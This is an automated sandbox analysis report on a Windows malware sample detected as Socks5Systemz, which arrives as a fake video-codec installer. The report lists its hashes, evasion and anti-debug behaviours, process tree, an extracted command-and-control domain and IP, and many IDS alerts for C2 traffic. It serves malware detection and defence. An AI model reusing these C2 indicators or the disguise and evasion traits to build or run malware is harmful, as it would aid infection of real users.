Windows Analysis Report
L9rm7AX4mp.exe

Overview

General Information

Sample name: L9rm7AX4mp.exe
(renamed because original name is a hash value)
Original sample name: 0396163369529cd5b010e3c35a2066c5.exe
Analysis ID: 1524739
MD5: 0396163369529cd5b010e3c35a2066c5
SHA1: c3f58efd6dc957d0baf6eb71e0f6539e5eb3d596
SHA256: 31d2bac123d451caed79ced03b80592dacc3499f6c91a9e32630d3590d52a6c0
Tags: exe, Socks5Systemz, user-abuse_ch

Detection

Socks5Systemz
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Socks5Systemz
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to infect the boot sector
Machine Learning detection for dropped file
PE file has a writeable .text section
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • L9rm7AX4mp.exe (PID: 4856 cmdline: "C:\Users\user\Desktop\L9rm7AX4mp.exe" MD5: 0396163369529CD5B010E3C35A2066C5)
    • L9rm7AX4mp.tmp (PID: 4996 cmdline: "C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp" /SL5="$20420,8045603,54272,C:\Users\user\Desktop\L9rm7AX4mp.exe" MD5: 16C9D19AB32C18671706CEFEE19B6949)
      • zextervideocodec32_64.exe (PID: 1216 cmdline: "C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe" -i MD5: 4AC9B0BE70B6E01BFD47FFA47289DED7)
  • cleanup
{"C2 list": ["ezebtfp.ua"]}
Source | Rule | Description | Author | Strings
00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |
00000003.00000002.3288670577.0000000002B20000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |
Process Memory Space: zextervideocodec32_64.exe PID: 1216 | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-03T08:39:57.996325+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49711 | 185.208.158.248 | 80 | TCP
2024-10-03T08:39:58.879562+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49712 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:01.788816+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49712 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:02.620011+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49715 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:03.096771+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49715 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:03.912593+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49717 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:04.832385+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49718 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:05.669677+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49719 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:06.018610+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49719 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:06.831497+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49720 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:08.481850+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49721 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:08.830452+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49721 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:09.645985+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49722 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:10.454749+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49723 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:11.275120+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49724 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:11.624286+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49724 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:11.967613+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49724 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:12.328222+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49724 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:13.668706+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49725 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:14.019252+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49725 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:14.838729+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49726 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:15.663948+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49727 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:16.468813+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49728 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:17.286665+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49729 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:18.088017+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49730 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:18.439019+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49730 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:19.251332+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49731 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:20.057528+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49732 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:20.409920+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49732 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:21.226324+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49733 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:22.025545+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49734 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:22.376751+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49734 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:23.198191+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49735 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:23.546290+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49735 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:23.890737+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49735 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:24.748977+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49736 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:25.095004+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49736 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:25.951345+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49737 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:26.309689+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49737 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:26.660761+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49737 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:27.473539+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49738 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:28.281045+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49739 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:29.573724+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49740 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:29.920486+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49740 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:30.274094+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49740 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:31.086834+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49741 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:31.954102+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49742 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:32.796761+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49743 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:33.609989+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49744 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:34.425353+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49745 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:35.274022+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49746 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:36.073350+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49747 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:36.429599+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49747 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:37.238142+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49748 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:38.061539+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49749 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:38.412198+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49749 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:39.225451+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49750 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:40.026491+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49751 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:40.389709+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49751 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:40.732228+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49751 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:41.558714+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49752 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:41.908031+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49752 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:42.893022+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49753 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:43.713226+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49754 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:44.063249+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49754 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:44.974334+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49755 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:46.182575+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49756 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:46.530399+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49756 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:47.354128+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49757 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:48.187718+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49758 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:49.043864+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49759 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:49.396093+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49759 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:50.227981+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49760 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:51.027289+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49761 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:51.381067+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49761 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:52.430482+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49764 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:53.253641+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49765 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:54.075772+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49766 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:54.886719+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49767 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:55.242928+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49767 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:56.045580+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49768 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:56.394950+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49768 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:57.227686+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49769 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:58.064857+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49772 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:59.087367+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49773 | 185.208.158.248 | 80 | TCP
2024-10-03T08:40:59.934414+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49774 | 185.208.158.248 | 80 | TCP
2024-10-03T08:41:00.787445+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49775 | 185.208.158.248 | 80 | TCP
2024-10-03T08:41:01.898165+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49776 | 185.208.158.248 | 80 | TCP
2024-10-03T08:41:02.736191+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49777 | 185.208.158.248 | 80 | TCP
2024-10-03T08:41:03.596214+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49778 | 185.208.158.248 | 80 | TCP
2024-10-03T08:41:04.426341+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49779 | 185.208.158.248 | 80 | TCP
2024-10-03T08:41:05.350713+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49780 | 185.208.158.248 | 80 | TCP
2024-10-03T08:41:07.092511+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49781 | 185.208.158.248 | 80 | TCP
2024-10-03T08:41:07.965780+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49782 | 185.208.158.248 | 80 | TCP

AV Detection

Source: zextervideocodec32_64.exe.1216.3.memstrmin | Malware Configuration Extractor: Socks5Systemz {"C2 list": ["ezebtfp.ua"]}
Source: L9rm7AX4mp.exe | ReversingLabs: Detection: 23%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\ProgramData\EMAIL Safe Storage 10.2.46\EMAIL Safe Storage 10.2.46.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_0045D4EC GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,1_2_0045D4EC
Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_0045D5A0 ArcFourCrypt,1_2_0045D5A0
Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_0045D5B8 ArcFourCrypt,1_2_0045D5B8
Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_10001000 ISCryptGetVersion,1_2_10001000
Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_10001130 ArcFourCrypt,1_2_10001130

Compliance

Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Unpacked PE file: 3.2.zextervideocodec32_64.exe.400000.0.unpack
Source: L9rm7AX4mp.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Zexter Video Codec_is1
Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: L9rm7AX4mp.tmp, 00000001.00000002.3288367581.0000000002383000.00000002.00000001.01000000.00000006.sdmp, L9rm7AX4mp.tmp, 00000001.00000003.2039453112.00000000031B0000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000003.2039392721.000000000209C000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000002.3287918641.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, _isdecmp.dll.1.dr
Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_00452A4C FindFirstFileA,GetLastError,1_2_00452A4C
Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_004751F8 FindFirstFileA,FindNextFileA,FindClose,1_2_004751F8
Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_00464048 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00464048
Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_004644C4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_004644C4
Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_00462ABC FindFirstFileA,FindNextFileA,FindClose,1_2_00462ABC
Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_00497A74 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_00497A74

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49711 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49728 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49722 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49741 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49761 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49729 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49712 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49759 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49743 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49719 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49753 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49746 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49731 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49720 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49736 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49750 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49723 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49724 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49745 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49738 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49727 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49765 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49730 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49748 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49737 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49733 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49726 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49721 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49754 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49766 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49747 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49742 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49767 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49758 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49734 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49717 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49780 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49782 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49744 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49777 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49755 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49781 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49756 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49752 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49779 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49732 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49768 -> 185.208.158.248:80
